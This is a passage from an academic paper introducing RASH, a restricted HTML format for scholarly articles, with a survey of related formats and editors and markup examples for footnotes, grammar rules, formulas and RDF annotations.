subsections, we discuss all the most important contributions in this area by splitting them into two main categories: (i) HTML-based formats and (ii) WYSIWYG editors for HTML documents. Note that we do not discuss in detail some other efforts that have recently been done by means of non-HTML languages, even if they are equally relevant for the community. ScholarlyMarkdown (http://scholarlymarkdown.com/) (Lin & Beales, 2015), for instance, is a syntax to produce scholarly articles according to a Markdown (http://daringfireball.net/ projects/markdown/) input. ShareLaTeX (https://www.sharelatex.com/) is a Web-based real-time collaborative editor for LaTeX documents. In Table 1 we briefly summarise the features and capabilities of the formats presented, in order to highlight the main differences between them. HTML-based formats One of the first documented contributions that proposed an HTML-based format for scholarly articles was Scholarly HTML (http://scholarlyhtml.org). It is not defined as a formal grammar, but as a set of descriptive rules which allows one to specify just a reduced amount of HTML tags for describing the metadata and content of a scholarly article. It is the main intermediate format used in ContentMine (http://contentmine.org) for describing the conversion of PDF content into HTML. Along the same lines, PubCSS (https://github.com/thomaspark/pubcss/) is a project which aims at pushing the use of HTML+CSS for writing scholarly articles. It does not define a formal grammar for the HTML element set to use. Rather it provides some HTML templates according to four different CSS styles, which mimic four LaTeX styles for Computer Science articles, i.e., ACM SIG Proceedings, ACM SIGCHI Proceedings, ACM SIGCHI Extended Abstracts, and IEEE Conference Proceedings. HTMLBooks (https://github.com/oreillymedia/HTMLBook/) is an O’Reilly’s specification for creating HTML documents (books, in particular) by using a subset of all the (X)HTML5 elements. This is one of the first public works by a publisher for pushing HTML-like publications, even if the status of its documentation (and, consequently, of its schema) is still ‘‘unofficial’’. Another project, which shares the same name of one of the previous ones, Scholarly HTML (https://github.com/scienceai/scholarly.vernacular.io), is a work by the science.ai (http://science.ai) company that aims at providing a domain-specific data format based on open standards (among which HTML5) for enabling ‘‘the interoperable exchange of scholarly articles in a manner that is compatible with off-the-shelf browsers’’ (Berjon & Ballesteros, 2015). While the format is not defined by any particular formal grammar, it has Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 4/35 https://peerj.com http://cs.unibo.it/save-sd/2015/index.html http://cs.unibo.it/save-sd/2016/index.html http://scholarlymarkdown.com/ http://daringfireball.net/projects/markdown/ http://daringfireball.net/projects/markdown/ https://www.sharelatex.com/ http://scholarlyhtml.org http://contentmine.org https://github.com/thomaspark/pubcss/ https://github.com/oreillymedia/HTMLBook/ https://github.com/scienceai/scholarly.vernacular.io http://science.ai http://dx.doi.org/10.7717/peerj-cs.132 Table 1 A comparison among existing HTML-oriented formats for scholarly papers according to seven distinct categories. Format Syntax Doc Formal grammar Semantic annotations CSS for different formats WYSIWYG editor Conversion from Conversion to RASHa HTML Available onlineb RelaxNGc RDFa, RDF/XML, Turtle, JSON-LD Web-based and Springer LNCS Apache OpenOffice, Mi- crosoft Word, RASH Javascript Editor (RAJE) ODT, DOCX LaTeX: ACM ICPS, ACM Journal Large, PeerJ CS, Springer LNCS Scholarly HTML (2011)d HTML Available online e None RDFa None None PDF (via ContentMine— Normaf) None PubCSSg HTML Available onlineh Informal (via HTML templates) None ACM SIG Proceedings, ACM SIGCHI Proceedings, ACM SIGCHI Extended Abstracts, and IEEE Confer- ence Proceedings None None PDF (via browser interface) HTML Booksi HTML Available onlinej XML Schemak None CSS files for PDF print- ing and EPUB/MOBI- compatible device visualisa- tions None None None Scholarly HTML (2015)l HTML Available onlinem None RDFa, JSON-LD Web-based Microsoft Word (as refer- enced onlinen and their on- line platform (no access for free guaranted as of 20 June 2017) DOCX None Scholarly HTML (2016)o HTML Available onlinep None RDFa, JSON-LD Web-based None None None dokieli format HTML Available onlineq Informal (via HTML templates and patterns) RDFa, Turtle, JSON-LD, TRiG Web-based (Native and Ba- sic), Springer LNCS, ACM ICPS dokielir None PDF (via browser interface) (continued on next page) P eronietal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.132 5/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.132 Table 1 (continued) Format Syntax Doc Formal grammar Semantic annotations CSS for different formats WYSIWYG editor Conversion from Conversion to Fiduswriter format HTML None None None Web-based Fiduswriters None HTML, EPUB, LaTeX Authorea format HTML None None None Web-based Authorea t DOCX, LaTeX DOCX, LaTeX (accord- ing to several stylesheets), PDF, Zipped structure with HTML Notes. ahttps://github.com/essepuntato/rash/. bhttp://cs.unibo.it/save-sd/rash. chttps://raw.githubusercontent.com/essepuntato/rash/master/grammar/rash.rng. dhttp://scholarlyhtml.org/. ehttp://scholarlyhtml.org/core-specification/. fhttps://github.com/ContentMine/norma. ghttps://github.com/thomaspark/pubcss/. hhttp://thomaspark.co/2015/01/pubcss-formatting-academic-publications-in-html-css/. ihttps://github.com/oreillymedia/HTMLBook/. jhttp://oreillymedia.github.io/HTMLBook/. khttps://raw.githubusercontent.com/oreillymedia/HTMLBook/master/schema/htmlbook.xsd. lhttps://github.com/scienceai/scholarly.vernacular.io. mhttp://scholarly.vernacular.io/. nhttps://science.ai/overview. ohttps://github.com/w3c/scholarly-html. phttps://w3c.github.io/scholarly-html/. qhttps://dokie.li/docs. rhttp://dokie.li. shttps://www.fiduswriter.org. thttps://www.authorea.com. P eronietal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.132 6/35 https://peerj.com https://github.com/essepuntato/rash/ http://cs.unibo.it/save-sd/rash https://raw.githubusercontent.com/essepuntato/rash/master/grammar/rash.rng http://scholarlyhtml.org/ http://scholarlyhtml.org/core-specification/ https://github.com/ContentMine/norma https://github.com/thomaspark/pubcss/ http://thomaspark.co/2015/01/pubcss-formatting-academic-publications-in-html-css/ https://github.com/oreillymedia/HTMLBook/ http://oreillymedia.github.io/HTMLBook/ https://raw.githubusercontent.com/oreillymedia/HTMLBook/master/schema/htmlbook.xsd https://github.com/scienceai/scholarly.vernacular.io http://scholarly.vernacular.io/ https://science.ai/overview https://github.com/w3c/scholarly-html https://w3c.github.io/scholarly-html/ https://dokie.li/docs http://dokie.li https://www.fiduswriter.org https://www.authorea.com http://dx.doi.org/10.7717/peerj-cs.132 1The main aim of the LinkedResearch project is to propose principles for enabling researchers to share and reuse research knowledge by means of existing Web and Semantic Web technologies towards a future world where researchers can publish and consume human-friendly and machine-readable (e.g., by using RDFa (Sporny, 2015)) scholarly documents. a well-described documentation (Berjon & Ballesteros, 2015) that teaches how to produce scholarly documents by using a quite large set of HTML tags, accompanied by schema.org (http://schema.org) annotations for describing specific structural roles of documents as well as basic metadata of the paper. The company also provides services that enable the conversion from Microsoft Word document into ScholarlyHTML format. One of the authors of the previous work is also the chair of a W3C community group called ‘‘Scholarly HTML’’ (https://www.w3.org/community/scholarlyhtml/) which aims at developing a HTML vernacular (https://github.com/w3c/scholarly-html) for the creation of a Web-first format for scholarly articles. It involves several people from all the aforementioned specifications (including RASH), and the group work should result in the release of a community-proposed interchange HTML format. As of September 22, 2017, the online documentation (https://w3c.github.io/scholarly-html/) is mainly a fork of the Scholarly HTML specification proposed by science.ai discussed above. HTML-oriented WYSIWYG editors One of the most important and recent proposals, which is compliant with the principles introduced as part of the Linked Research (http://linkedresearch.org) project1, is dokieli (https://dokie.li) (Capadisli et al., 2017). Dokieli is a web application (still under development) that allows the creation of HTML-based scholarly articles directly on the browser, and implements several features among which are annotations (in RDF) and a notification system. The application makes also available some HTML templates and a series of widgets for navigating, visualising (in different formats) and printing research documents easily by using common browsers. Fidus Writer (https://www.fiduswriter.org/) is another Web-based application for creating HTML scholarly documents by means of a wordprocessor-like interface. While the particular format used is not explicitly specified, it allows the conversion of the HTML documents created within the application in two different formats, i.e., EPUB and LaTeX (alongside with HTML). Authorea (https://www.authorea.com) is a Web service that allows users to write papers by means of a clear and effective interface. It enables the inclusion of the main components of scientific papers such as inline elements (emphasis, quotations, etc.), complex structures (figures, equations, etc.), and allows the use of Markdown and LaTeX for adding more sophisticated constructs. In addition, Authorea is able to export the document in four different formats (PDF, LaTeX, DOCX, and zipped archive with several HTML files) and according to a large number of stylesheets used in academic venues. WHICH “WEB-FIRST” FORMAT FOR RESEARCH ARTICLES? The term ‘‘Web-first’’ format indicates the possibility of using HTML as a primary format to write, store and transfer research articles, and not only to make these articles available on the Web. Some questions naturally arise in this context: shall we use the full HTML? If we impose a limited subset, which elements should we consider? Shall we demand specific rules for using the language? Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 7/35 https://peerj.com http://schema.org https://www.w3.org/community/scholarlyhtml/ https://github.com/w3c/scholarly-html https://w3c.github.io/scholarly-html/ http://linkedresearch.org https://dokie.li https://www.fiduswriter.org/ https://www.authorea.com http://dx.doi.org/10.7717/peerj-cs.132 2Note that accepting HTML as format for submissions in conferences/workshops is a totally different issue, since this choice is normally taken by the organisers. For instance, see the SAVE-SD 2015 call for papers (http://cs.unibo.it/save- sd/2015/submission.html) and the various editions of SePublica (http://ceur- ws.org/Vol-1155/). Some works, e.g., Capadisli, Riedl & Auer (2015), suggest not to force any particular HTML structure for research papers. This choice would allow authors to use whatever HTML structure they want for writing papers and would reduce (even, eliminate) the fear for the template bottleneck, i.e., the fact that users may not adopt a particular language if they are compelled to follow specific rules. On the other hand, leaving to the authors the freedom of using, potentially, the whole HTML specification may affect, in some way, the whole writing and publishing process of articles. The author could adopt any kind of HTML linearisation, e.g., using elements div instead of elements section, using elements table for their presentational behaviour (i.e., how they are rendered by browsers or other software readers) and not for presenting tabular data, and the like. This freedom could result in two main kinds of issues: • visualisation bottleneck—it may affect the correct use of existing, well-developed and pretty standard CSSs (e.g., Capadisli’s CSSs developed for Dokieli (https://dokie.li)) for both screen and print media, in having to write new codes for handling paper visualisation correctly; • less focus on the research content—the fact that a certain paper is not visualised in a browser very well (or, worse, in a way that is not the one the author expects) could bring the author to work on the presentation of the text, rather than on focussing on the actual research content of the text. Another point against the use of any HTML syntax for writing papers concerns the possibility of enabling an easy way for sharing the paper with others (e.g., co-authors) who, potentially, may not use HTML in the same way. If all the co-authors of a paper are able to use the full HTML, they may not understand other users’ specific use of some HTML tags —‘‘why did they use the elements section instead of div?’’; ‘‘what is this freaky use of elements table?’’. Hence, the advantages of using a common HTML format is quite evident: only one syntax and only one possible semantics. There is a further issue worth mentioning. Having a shared, unambiguous and simple format would facilitate conversions from/into other complex ones (e.g., ODT (JTC1/SC34 WG 6, 2006), OOXML (JTC1/SC34 WG 4, 2011), DocBook (Walsh, 2009), JATS (National Information Standards Organization, 2012), thus enabling authors to use their own text editors or word-processors to modify the articles. The conversion is instead much more complex, error-prone and imprecise on the full HTML. To complicate an already complex scenario there is the necessary involvement of publishers. Allowing the authorsto use their ownHTML format couldbe counterproductive from a publisher’s perspective, in particular when we speak about the possibility of adopting such HTML formats for regular conference/journal camera-ready submissions. From a recent discussion on the Force11 mailing list (https://groups.google.com/forum/#!topic/ forcnet/g4BNAOOMjMM), it emerges that publishers are willing to adopt HTML for submissions if and only if it is a clear community need. It means that they will include HTML formats in the publishing workflow only once a number of conference organisers decides to include HTML among the accepted formats for paper submissions2. However, using one clear Web-first format, rather than a plethora of possible variations allowed by Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 8/35 http://cs.unibo.it/save-sd/2015/submission.html http://cs.unibo.it/save-sd/2015/submission.html http://ceur-ws.org/Vol-1155/ http://ceur-ws.org/Vol-1155/ https://peerj.com https://dokie.li https://groups.google.com/forum/#!topic/forcnet/g4BNAOOMjMM https://groups.google.com/forum/#!topic/forcnet/g4BNAOOMjMM http://dx.doi.org/10.7717/peerj-cs.132 3OASIS LegalDocumentML is the standardisation of AkomaNtoso (http: //www.akomantoso.org/), which is a set of simple technology-neutral electronic representations in XML format of parliamentary, legislative and judiciary documents, and has been already adopted by several parliaments in European Union, Africa, and South America. the full HTML schema, would certainly lighten the burden of publishers for including HTML within their publishing workflow. This inclusion could be additionally favoured by the availability of services (e.g., editors, converters, enhancers, visualisers) for facilitating the use of such a Web-first format within the existing publishing environments. Last but not least, using a controlled subset of HTML is more appropriate for Semantic Publishing applications (Shotton et al., 2009; Peroni, 2014b). The development of scripts and applications to extract, for instance, RDF statements directly from the markup structure of the text is a sort of nightmare if different authors use HTML in different manners. For instance, what happens when trying to extract the rhetorical organisation of a scientific paper according to the Document Component Ontology (DoCO) (http://purl.org/spar/doco) (Constantin et al., 2016) from two HTML documents that use HTML tags in different ways? Is an HTML element table an actual table (containing tabular data)? Which are the tags identifying sections? These analyses are all easier within a controlled and unambiguous subset of HTML. WRITING SCHOLARLY ARTICLES IN HTML WITH RASH The subset of HTML we propose in RASH is strictly compliant to a patterns theory we have developed over the past few years. Patterns are widely accepted solutions to handle recurring problems. Firstly introduced for architecture and engineering problems (Alexander, 1979), they have been successfully deployed in computer science and in particular in software engineering (Gamma et al., 1994). In this section, we briefly introduce our patterns for document engineering and then we go into the details of RASH. Theoretical foundations: structural patterns While we have plenty of tools and languages for creating new markup languages (e.g., RelaxNG (Clark & Makoto, 2001) and XMLSchema Gao, Sperberg-McQueen & Thompson, 2012), these usually do not provide any particular guideline for fostering the development of robust and well-shaped document languages. In order to fill that gap, in the last decade we have experimented with the use of a theory of structural patterns for markup documents (Di Iorio et al., 2014), that has since been applied in several national and international standards, among which OASIS LegalDocumentML (https://www.oasis-open.org/committees/legaldocml/)3, a legal document standard for the specification of parliamentary, legislative and judicial documents, and for their interchange between institutions in different countries. The basic idea behind this theory is that each element of a markup language should comply with one and only one structural pattern, depending on the fact that the element: • can or cannot contain text (+t in the first case, −t otherwise); • can or cannot contain other elements (+s in the first case, −s otherwise); • is contained by another element that can or cannot contain text (+T in the first case, −T otherwise). Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 9/35 http://www.akomantoso.org/ http://www.akomantoso.org/ https://peerj.com http://purl.org/spar/doco https://www.oasis-open.org/committees/legaldocml/ http://dx.doi.org/10.7717/peerj-cs.132 By combining all these possible values—i.e.,±t,±s, and±T—we basically obtain eight core structural patterns, namely (accompanied by a plausible example within the HTML elements): 1. inline [+t+s+T], e.g., the element em; 2. block [+t+s−T], e.g., the element p; 3. popup [−t+s+T], e.g., the element aside; 4. container [−t+s−T], e.g., the element section; 5. atom [+t−s+T], e.g., the element abbr; 6. field [+t−s−T], e.g., the element title; 7. milestone [−t−s+T], e.g., the element img; 8. meta [−t−s−T], e.g., the element link. Instead of defining a large number of complex and diversified structures, the idea is that a small number of structural patterns are sufficient to express what most users need for defining the organisation of their documents. Therefore, the two main aspects related to such patterns are: • orthogonality—each pattern has a specific goal and fits a specific context. It makes it possible to associate a single pattern to each of the most common situations in document design. Conversely, for every situation encountered in the creation of a new markup language, the corresponding pattern is immediately selectable and applicable; • assemblability—each pattern can be used only in some contexts within other patterns. This strictness provides expressiveness and non-ambiguity in the patterns. By limiting the possible choices, patterns prevent the creation of uncontrolled and misleading content structures. Such patterns allow authors to create unambiguous, manageable and well-structured markup languages and, consequently, documents, fostering increased reusability (e.g., inclusion, conversion, etc.) among different languages. Also, thanks to the regularity they provide, it is possible to perform easily complex operations on pattern-based documents even when knowing very little about their vocabulary (automatic visualisation of document, inferences on the document structure, etc.). In this way, designers can implement more reliable and efficient tools, can make a hypothesis regarding the meanings of the document fragments, can identify singularities and can study the global properties of a set of documents, as described in Di Iorio et al. (2012) and Di Iorio et al. (2013). HTML does not use the aforementioned patterns in a systematic way, as it allows the creation of arbitrary and, sometimes, quite ambiguous structures. To apply the structural pattern guidelines for RASH, we restricted HTML by selecting a good subset of elements expressive enough to capture the typical components of a scholarly article while being also well-designed, easy to reuse and robust. RASH: Research Article in Simplified HTML The Research Articles in Simplified HTML (RASH) format is a markup language that restricts the use of HTML (http://www.w3.org/TR/html5/) elements to only 32 elements for writing academic research articles. It allows authors to use embedded RDF annotations. Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 10/35 https://peerj.com http://www.w3.org/TR/html5/ http://dx.doi.org/10.7717/peerj-cs.132 4Please refer to the official RASH documentation, available at https: //rawgit.com/essepuntato/rash/master/ documentation/index.html, for a complete introduction of all the elements and attributes that can be used in RASH documents. 5The following prefixes are always mandatory in any RASH document: •schema: http://schema.org/ •prism: http://prismstandard.org/ namespaces/basic/2.0/. In addition, RASH strictly follows the Digital Publishing WAI-ARIA Module 1.0 (Garrish et al., 2016) for expressing structural semantics on various markup elements used. All RASH documents begin as a simple HTML5 document4 (Hickson et al., 2014), by specifying the generic HTML DOCTYPE followed by the document element html with the usual namespace (‘‘http://www.w3.org/1999/xhtml’’) and with additional (and mandatory) prefix declarations through the attribute prefix5. The element html contains the element head for defining metadata of the document according to the DCTERMS (http: //dublincore.org/documents/dcmi-terms/) and PRISM (http://www.prismstandard.org/) standards and the element body for including the whole content of the document. The element head of a RASH document must include some information about the paper, i.e., the paper title (element title), at least one author, while other related information (i.e., affiliations, keywords and categories included using the elements meta and link) are optional. The element body mainly contains textual elements (e.g., paragraphs, emphases, links, and quotations) for describing the content of the paper, and other structural elements (e.g., abstract, sections, references, and footnotes) used to organise the paper in appropriate blocks and to present specific complex structures (e.g., figures, formulas, and tables). In the following subsection, we provide a quick discussion about usage patterns in RASH, and introduce the tools used for developing its grammar. Development and patterns The development of RASH started from the whole HTML5 grammar, and proceeded by removing and restricting the particular use of HTML elements, to make them expressive enough for representing the structures of scholarly papers and to have the language totally compliant with the theory on structural patterns for XML documents (Di Iorio et al., 2014) introduced in ‘Theoretical foundations: structural patterns’. The systematic use of these structural patterns is an added value in all stages of the documents’ lifecycle: they can be guidelines for creating well-engineered documents and vocabularies, rules to extract structural components from legacy documents, indicators to study to what extent documents share design principles and community guidelines. All these characteristics have allowed us to simplify, at least to some extent, the handling of all the requirements introduced in ‘Introduction’ and ‘Which ‘‘Web-first’’ Format for Research Articles?’ in RASH. Table 2 shows what is the current pattern assignment for each element in RASH. Notice that we do not use two patterns presented in ‘Theoretical foundations: structural patterns’, namely atom and popup. The elements compliant with the former pattern are contained in discursive blocks (e.g., paragraphs) and contain only textual content with no additional elements. This is very infrequent in scholarly writings since any element used for emphases, links, and other in-sentence elements can always contain additional elements (e.g., an emphasis can contain a link). A different discourse can be done for the pattern popup, which is meant to represent complex substructures that interrupt but do not break the main flow of the text, such as footnotes (Di Iorio et al., 2014). An element compliant to the popup pattern, while still not allowing directly text content inside itself, is found in elements with a mixed context Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 11/35 https://rawgit.com/essepuntato/rash/master/documentation/index.html https://rawgit.com/essepuntato/rash/master/documentation/index.html https://rawgit.com/essepuntato/rash/master/documentation/index.html http://schema.org/ http://prismstandard.org/namespaces/basic/2.0/ http://prismstandard.org/namespaces/basic/2.0/ https://peerj.com http://www.w3.org/1999/xhtml http://dublincore.org/documents/dcmi-terms/ http://dublincore.org/documents/dcmi-terms/ http://www.prismstandard.org/ http://dx.doi.org/10.7717/peerj-cs.132 Table 2 The use of structural patterns in RASH. Pattern RASH element inline a, code, em, math, q, span, strong, sub, sup, svg block figcaption, h1, p, pre, th popup none container blockquote, body, figure, head, html, li, ol, section, table, td, tr, ul atom none field script, title milestone img meta link, meta [t+s+]. In particular, in developing RASH, we discussed which of the following two possible approaches for defining footnotes was more adequate to our needs. The first option was a container-based behaviour, also suggested by JATS (National Information Standards Organization, 2012) by means of the element fn-group and not included in HTML specifications, that allows the authors to specify footnotes (through the element ft) by using a tag that is totally separated from the main text from which it is referenced (usually through XML attributes), as shown in the following excerpt: <-- A paragraph referring to a footnote --> <p> In this paragraph there is an explicit reference to the second footnote <xref rid="n2"></xref >. </p> <-- The group containing all the footnotes --> <fn-group > <fn id="n1"> <p>This is a paragraph within a footnote.</p> </fn> <fn id="n2"> <p>This is a paragraph in another footnote.</p> <p> All the footnotes are contained in a group , so as to collect them together. </p> </fn> ... </fn-group > The alternative was a popup-based behaviour, used by default in LaTeX (through the marker \footnote{}) and even possible in JATS (which is a very permissive language by design), where a paragraph can be abruptly interrupted by one or more paragraphs specified in a footnote, as shown in the following excerpt: <-- A paragraph containing a footnote --> <p> In this paragraph the footnote <fn id="n3"><p>That is what we call popup -based behaviour !.</p></fn> has been defined directly within it. </p> We considered the latter approach a bit confusing, since it actually decreases the readability of the HTML source where footnotes are needed. We thus decided to adopt a solution similar to the JATS fn-group element, extending the HTML5 section element with @role set to doc-endnotes and doc-endnote: Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 12/35 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.132 6The content model of an element is the particular organisation of its content in terms of text, attributes and elements that it can contain. <-- A paragraph referring to a footnote --> <p> In this paragraph there is an explicit reference to the second footnote <a href ="# fn2"></a>. </p> <-- The group containing all the footnotes --> <section role="doc -endnotes"> <section role="doc -endnote" id="fn1"> <p>This is the text of a footnote.</p> </section > <section role="doc -endnote" id="fn2"> <p>This is the text of another footnote.</p> </section > ... </section > Grammar and peculiarities The formal grammar of RASH (https://raw.githubusercontent.com/essepuntato/rash/ 7ef4c2f2ea63575fb32f17e826d60333543eda67/grammar/rash.rng) (current version: 0.6.1) has been developed by means of RelaxNG (Clark & Makoto, 2001), which is a simple, easy to learn, and powerful schema language for XML. The grammar has been logically organised in four distinct logical blocks of syntactic rules, defining respectively elements, attributes, content models6 for the elements and their related attribute lists, as summarised in the following excerpt: ... <define name="p"> <element name="p"> <ref name=" attributes_html_element_no_role" /> <ref name=" cm_inline" /> </element > </define > ... <define name=" aClass"> <attribute name="class"> <data type=" NMTOKENS" /> </attribute > </define > ... <define name=" cm_inline"> <zeroOrMore > <choice > <text /> <ref name="a" /> <ref name="aRef" /> <ref name="img" /> <ref name="svg" /> <ref name="math" /> <ref name=" img_math" /> <ref name=" span_latex" /> <ref name="span" /> <ref name="code" /> <ref name="sub" /> <ref name="sup" /> <ref name="em" /> <ref name=" strong" /> <ref name="q" /> </choice > </zeroOrMore > </define > ... <define name=" attributes_html_element_no_role"> <ref name=" attributes_html_generic" /> <optional > <ref name=" aClass" /> </optional > <ref name=" attributes_rdfa" /> </define > ... Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 13/35 https://peerj.com https://raw.githubusercontent.com/essepuntato/rash/7ef4c2f2ea63575fb32f17e826d60333543eda67/grammar/rash.rng https://raw.githubusercontent.com/essepuntato/rash/7ef4c2f2ea63575fb32f17e826d60333543eda67/grammar/rash.rng http://dx.doi.org/10.7717/peerj-cs.132 7In the paper, for the sake of clarity, we use the prefix ‘‘@’’ when we name attributes (e.g., the attribute named ‘‘role’’ is introduced as @role), while we just name elements with their name (e.g., section). Starting from the latest versions of the language, there has been a clear shift towards an extended use of HTML5 semantic elements, despite the fact they are not backwards compatible with their more generic alternatives in HTML4 (Raggett, Le Hors & Jacobs, 1999). In particular, the elements section, figure, and figcaption have been adopted so as to clearly refer to paper sections and boxes with tables, figures, listings and formulas, accompanied by a particular caption. While this choice has fostered the readability of the source, the use of these HTML5 elements was not enough to provide proper semantics and accessibility to the RASH source. Thus, in order to improve the user experience in terms of accessibility of such HTML-based papers, RASH reuses some items from the W3C Accessible Rich Internet Applications 1.1 (Diggs et al., 2015), and also exploits several roles introduced in the Digital Publishing WAI-ARIA Module 1.0 (Garrish et al., 2016), which allows the ‘‘digital publishers to apply the structural semantics they need to drive the authoring process while getting free accessibility’’ (https://lists.w3.org/Archives/Public/public-dpub-aria/2016Feb/0032.html). The use of such semantics is implemented by means of the attribute @role7, that can be used on certain RASH elements, e.g., sections, and it is very useful for specifying a clear structural semantics where it is not formally defined. For instance, all the references are organised in a list within a special section defined by using the element section with the attribute @role set to ‘‘doc-bibliography’’. This special section contains one list with a bibliographic reference for each list item (i.e., the element li accompanied by the attribute @id for referencing to it within the text and the attribute @role set to ‘‘doc-biblioentry’’), as shown in the following excerpt: <section role="doc -bibliography"> <h1>References </h1> <ol> <li id=" Per2014" role="doc -biblioentry"> <p>Write here the reference entry.</p> </li> ... </ol> </section > Formulas require special consideration, since there are different ways to implement them. The standard specification for representing mathematics on the Web is MathML (Carlisle, Ion & Miner, 2014). Even if MathML is the best accessible way for writing mathematical formulas, the organisation of the elements for defining even a simple formula is quite verbose and this is a reasonable obstacle to its direct adoption, as shown in the following excerpt for describing the formula πr2: <math xmlns="http ://www.w3.org /1998/ Math/MathML"> <mi>π </mi> <mo ></mo> <msup > <mi>r</mi> <mn >2</mn> </msup > </math > To help the creator of RASH documents in dealing with formulas, RASH adds two other ways for writing formulas in addition to MathML. The first one is to use an image (element img), which is a very simple way to include maths in a paper. On the other hand, it is not accessible at all since the various elements of the formula are not marked-up properly Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 14/35 https://peerj.com https://lists.w3.org/Archives/Public/public-dpub-aria/2016Feb/0032.html http://dx.doi.org/10.7717/peerj-cs.132 so as to distinguish them. Another option is to use LaTeX (or, alternatively, ASCIIMath: http://asciimath.org), which is one of the most common ways to write formulas in many scientific papers. Both options are specifiable in RASH by using either the element img or the element span respectively, accompanied by the attribute @role set to ‘‘math’’, as shown in the following excerpt: <-- Specifying a formula through the element 'img ' --> <img role="math" src=" formula.png" alt="r^2" /> <-- Specifying a formula in LaTeX through the element 'span ' --> <span role="math">\pi r^2</span > The rendering of any LaTeX or ASCIIMath formula and the multi-browser support for MathML is implemented by using MathJax (https://www.mathjax.org/), which is a Javascript display engine for mathematics that works in most modern browsers. Of course, it is necessary to explicitly import MathJax in the element head if any rendering of formulas is actually needed, as shown in the following:  <script src="https :// cdnjs.cloudflare.com/ajax/libs/mathjax /2.7.1/ MathJax.js?config=TeX -AMS - MML_HTMLorMML"> </script > RASH has been developed in order to allow anyone to add RDFa annotations (Sporny, 2015) to any element of the document. For instance, this paragraph contains the following RDF statement (in Turtle (Prud’hommeaux & Carothers, 2014)): @prefix cito: <http :// purl.org/spar/cito/> . <> cito:credits <http ://www.w3.org/TR/rdfa -syntax/> . That was implemented by using specific RDFa attributes (@property and @resource, in this case) within the paragraph content, while the prefixes were defined in the element html, as shown in the following excerpt: <html prefix ="cito: http :// purl.org/spar/cito/"> ... <p> RASH has been developed in order to allow anyone to add <span property ="cito:credits" resource ="http ://www.w3.org/TR/rdfa -syntax/">RDFa </span > annotations <a href ="# rdfa"></a> to any element of the document. </p> ... </html > In addition to RDFa, RASH makes available another way to inject RDF statements (Cyganiak, Wood & Lanthaler, 2014) to the document, by means of an element script (within the element head): • with the attribute type set to ‘‘text/turtle’’ for adding plain Turtle content (Prud’hommeaux & Carothers, 2014); • with the attribute type set to ‘‘application/ld+json’’ for adding plain JSON-LD content (Sporny, Kellogg & Lanthaler, 2014); • with the attribute type set to ‘‘application/rdf+xml’’ for adding plain RDF/XML content (Gandon & Schreiber, 2014). An example of the use of the script for Turtle and JSON-LD statements is shown in the following excerpt: Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 15/35 https://peerj.com http://asciimath.org https://www.mathjax.org/ http://dx.doi.org/10.7717/peerj-cs.132 <script type="text/turtle"> @prefix pro: <http :// purl.org/spar/pro/> . @prefix foaf: <http :// xmlns.com/foaf /0.1/& gt; . @prefix sd: <https :// w3id.org/scholarlydata/person /> . sd:silvio -peroni a foaf:Person ; foaf:givenName "Silvio" ; foaf:familyName "Peroni" ; foaf:homepage <http ://www.essepuntato.it> ; pro:holdsRoleInTime [ a pro:RoleInTime ; pro:withRole pro:author ; pro:relatesToDocument <> ] . </script > <script type=" application/ld+json"> { "@context ": { "nick": "http :// xmlns.com/foaf /0.1/ nick", "sd": "https :// w3id.org/scholarlydata/person /" }, "@id": "sd:silvio -peroni", "nick": ["S.", "essepuntato "] } </script > It is worth noticing that RASH does not require any particular vocabulary for introducing RDF statements, except three properties from schema.org (http://schema.org) for defining author’s metadata (see the RASH documentation (https://rawgit.com/essepuntato/rash/ master/documentation/index.html#metadata) for additional details). For instance, in this document (in particular, in its RASH version (https://w3id.org/people/essepuntato/ papers/rash-peerj2016.html)) we mainly use CiTO (Peroni & Shotton, 2012) and other SPAR Ontologies (Peroni, 2014a) for creating citation statements about the paper itself, but alternative and/or complementary vocabularies are freely usable as well. THE RASH FRAMEWORK One of the issues we had to face, and in general anyone has to face when proposing a new markup language, was to provide tools for writing papers in RASH. It is undeniable that: • not all the potential authors are able (or willing) to write scholarly articles in HTML, even within the Web community; • not all the potential authors are able (or willing) to manually add additional semantic annotations, even within the Semantic Web community. The authorial activity of writing an article by using RASH, but also any other new Web-first format, must be supported by appropriate interfaces and tools to reach a broad adoption. A possible solution was to implement a native HTML authoring environment, so that authors did not have to deal directly with the new language. However, this solution would have forced all co-authors to use to the same tool and introduced a variety of technical difficulties, since it is not easy to create and support a user friendly and flexible work environment. We believe that a more liberal approach, that allows each author to keep using her/his preferred tools, even off-line, is more practical. This is the idea behind the RASH Framework (https://github.com/essepuntato/rash) (Peroni, 2017): a set of specifications and writing/conversion/extraction tools for Peroni et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.132 16/35 https://peerj.com http://schema.org https://rawgit.com/essepuntato/rash/master/documentation/index.html#metadata https://rawgit.com/essepuntato/rash/master/documentation/index.html#metadata https://w3id.org/people/essepuntato/papers/rash-peerj2016.html https://w3id.org/people/essepuntato/papers/rash-peerj2016.html https://github.com/essepuntato/rash http://dx.doi.org/10.7717/peerj-cs.132 Figure 1 RASH Framework. The RASH Framework and its main components. writing articles in RASH. In this section, we give a brief description of all the tools we have developed in the framework. All the software components are distributed under an ISC License (http://opensource.org/licenses/ISC), while the other components are distributed under a Creative Commons Attribution 4.0 International License (http://creativecommons.org/licenses/by/4.0/). A summary of the whole framework is introduced in Fig. 1. Validating RASH documents RASH has been developed as a RelaxNG grammar (Clark & Makoto, 2001), i.e., a well- known schema language for XML documents. All the markup items it defines are fully compatible with the HTML5 specifications (Hickson et al., 2014). In order to check whether a document is compliant with RASH, we developed a script 